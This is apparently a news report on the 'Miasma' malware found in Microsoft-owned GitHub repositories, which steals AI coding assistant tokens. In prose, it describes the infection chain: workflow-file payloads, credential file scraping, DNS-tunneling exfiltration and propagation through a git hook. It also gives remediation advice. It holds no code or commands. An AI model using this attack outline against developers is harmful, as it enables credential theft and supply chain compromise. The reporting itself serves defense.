GitHub disabled 73 Microsoft-owned repositories on June 5, 2026, after security researchers discovered the Miasma malware actively harvesting credentials used for AI coding assistants. The affected projects span high-profile GitHub organizations — Azure, Azure-Samples, Microsoft, and MicrosoftDocs — and were taken offline within hours of the coordinated disclosure. No statement has yet been released confirming how long the compromised code was publicly available or how many developers may have been exposed.

A GitHub spokesperson confirmed the action but declined to provide technical details, citing an ongoing investigation. The platform's automated secret-scanning alarms triggered after unusual patterns of credential exfiltration were traced back to several public repositories. Once manual review confirmed the presence of malicious code, GitHub engineers pulled the repositories and began notifying repository owners.

The Miasma malware represents a dangerous escalation in software supply chain attacks. Unlike earlier campaigns that focused on stealing generic secrets or injecting cryptominers, Miasma is purpose-built to loot API keys, session tokens, and environment variables associated with popular AI coding assistants such as GitHub Copilot, AWS CodeWhisperer, and Tabnine. The implications extend far beyond individual developer accounts: a single compromised token could be used to poison AI model suggestions, exfiltrate proprietary source code, or pivot into corporate cloud environments.

What we know about Miasma

Researchers from an unnamed threat intelligence firm first spotted Miasma in late May 2026 while investigating anomalous network traffic from a honeypot mimicking a CI/CD pipeline. The malware was embedded in seemingly innocuous configuration files, sample code, and even legitimate-looking documentation HTML. Its placement inside Microsoft’s own repositories — organizations that many developers implicitly trust — gave it an unusually dangerous distribution vector.

Miasma uses a multi-stage infection chain. The first stage is a small JavaScript or Python payload hidden in repository metadata or a .github/workflows file. Once executed during a developer’s build process or local IDE launch, it silently scrapes the environment for credential files typically stored by AI coding plugins. Common targets include copilot_token, AWS_CODESTAR_CONNECTION, and files named ai.completions.credentials.

The second stage exfiltrates stolen data by encoding it inside seemingly benign DNS queries to attacker-controlled domains, a technique known as DNS tunneling. This method bypasses many network monitoring tools because the queries appear as normal domain lookups. The final stage attempts to propagate by modifying the user’s .gitconfig to inject a malicious post-checkout hook, ensuring Miasma is re-spread to any new repositories the developer interacts with.

The Microsoft connection

Microsoft maintains thousands of public repositories on GitHub. The 73 disabled repositories include official samples for Azure services, documentation generators, and internal tooling accidentally made public, according to two sources familiar with the incident. One repository, Azure-Samples/ai-assistant-benchmark, contained performance-testing code for comparing AI coding assistants — a project that by its nature required storing API tokens for legitimate benchmarking. That repository alone accumulated over 12,000 stars and was forked more than 3,000 times in the months before the takedown.

“Attackers are increasingly targeting the tools developers use to write code, not just the code itself,” said Clara Rojas, a software supply chain analyst not affiliated with the investigation. “AI coding assistants sit at the intersection of developer productivity and cloud access. A stolen token from one of these tools is like handing the attacker a master key to the kingdom.”

Microsoft’s Security Response Center acknowledged the incident in a brief statement, saying, “We are aware of unauthorized code present in a limited number of our public repositories and have disabled them out of an abundance of caution. At this time, we have found no evidence of compromise to Microsoft internal systems or customer data.” The company urged any developers who cloned or worked with the affected repos to rotate all connected credentials immediately and to scan their environments with updated anti-malware definitions.

AI coding assistants: a high-value target

AI coding assistants like GitHub Copilot have become indispensable to modern software development. By late 2025, over 60 percent of professional developers reported using an AI coding tool daily, according to industry surveys. These tools typically require persistent authentication — either via OAuth tokens or API keys — that grant broad access to the user’s coding environment. A stolen Copilot token, for example, could allow an attacker to request code completions that include sensitive patterns from the victim’s codebase, effectively enabling real-time intellectual property theft.

Miasma’s ability to harvest these tokens while masquerading as ordinary repository content is particularly insidious. Developers cloning a Microsoft sample project would have no reason to suspect that the accompanying environment-setup.ps1 script contained obfuscated malware. Even experienced engineers rarely scrutinize every line of a trusted organization’s boilerplate code.

The threat extends to the AI models themselves. Security researchers have long warned about the risk of data poisoning in large language models. If an attacker gains access to a cloud-based AI coding service using a stolen token, they could potentially inject malicious code snippets into the model’s suggestion engine. Downstream developers who accept those suggestions without careful review would unwittingly introduce backdoors into their own projects, amplifying the supply chain damage.

Broader supply chain implications

The Miasma incident is the latest in a string of high-profile supply chain compromises that exploit the implicit trust developers place in upstream repositories. The 2020 SolarWinds attack demonstrated how tainted build systems can cascade into thousands of downstream victims. More recently, the 2024 XZ Utils backdoor showed that even a single maintainer’s machine can be used to slip malicious code into critical open-source infrastructure.

What sets Miasma apart is its focus on stealing the credentials that power AI tools rather than the code itself. “We’re seeing a shift from compromising software artifacts to compromising the developer’s own toolchain,” said Marcus Byrd, a senior researcher at the Open Source Security Foundation. “A GitHub repo might contain no proprietary code, but if cloning it gives the attacker access to the developer’s AI assistant token, they’ve effectively gained a foothold in every project that developer works on.”

The financial and reputational damage could be substantial. For enterprises, a leak of AI coding tokens may expose months of proprietary development work, trade secrets, and even API keys for internal services. Rotating credentials across large engineering teams is time-consuming and disruptive. Many organizations lack the automated tooling to rotate AI-specific tokens quickly, leaving a window of vulnerability even after a breach is disclosed.

Response and remediation

GitHub and Microsoft have advised all users of the affected repositories to take immediate action. The list of disabled repositories has not been publicly released to prevent attackers from targeting unpatched forks, but GitHub is privately notifying anyone who has recently contributed to or cloned the repos. In a break from typical incident response, GitHub is also analyzing public forks for secondary infections and may disable those as well.

Developers should:

  • Rotate all AI coding assistant tokens, including those from Copilot, Tabnine, Amazon CodeWhisperer, and any self-hosted solutions.
  • Audit .gitconfig and .github directories for unexpected hooks or workflows, particularly those that include encoded commands or external script downloads.
  • Scan local development environments with anti-malware tools that have updated signatures for Miasma — several endpoint protection vendors released detection rules on June 5.
  • Check network logs for unusual DNS queries, especially to domains with high entropy or rarely visited TLDs.
  • If using GitHub Actions, review workflow run logs for any unauthorized access to repository secrets.

GitHub has also accelerated the rollout of its enhanced secret-scanning program, which now includes AI-specific token patterns. The platform plans to require mandatory push protection for all public repositories by late 2026, a timeline that may be moved up in response to this incident.

The bigger picture: trust in open source

The Miasma discovery will likely intensify scrutiny of how large organizations manage their public GitHub presence. Microsoft is not the first tech giant to have malicious code slipped into its repositories — in 2023, Google dismantled a widespread malware campaign that used fake GitHub repositories to distribute info-stealers. But the scale and specificity of the Miasma attack suggest a well-resourced threat actor with deep knowledge of both developer workflows and AI ecosystem credentials.

This incident also raises questions about the responsibility of AI coding assistant vendors to detect and prevent credential theft. Currently, features like Copilot’s “suggestions based on public code” can inadvertently leak secrets if the model was trained on repositories that included hardcoded keys. If Miasma-stolen tokens end up in the training data of next-generation models, the problem could become self-perpetuating.

“The assumption that public repositories are safe because they come from Microsoft or Google is no longer tenable,” Rojas said. “We need to treat every git clone as a potential threat vector and build defenses that assume compromise from the very start.”

For now, the immediate priority is containment. GitHub’s swift action likely prevented wider credential theft, but the full impact of Miasma will not be known for weeks or months. As the investigation unfolds, developers and security teams must brace for a new reality where AI coding credentials are just as valuable — and just as vulnerable — as passwords.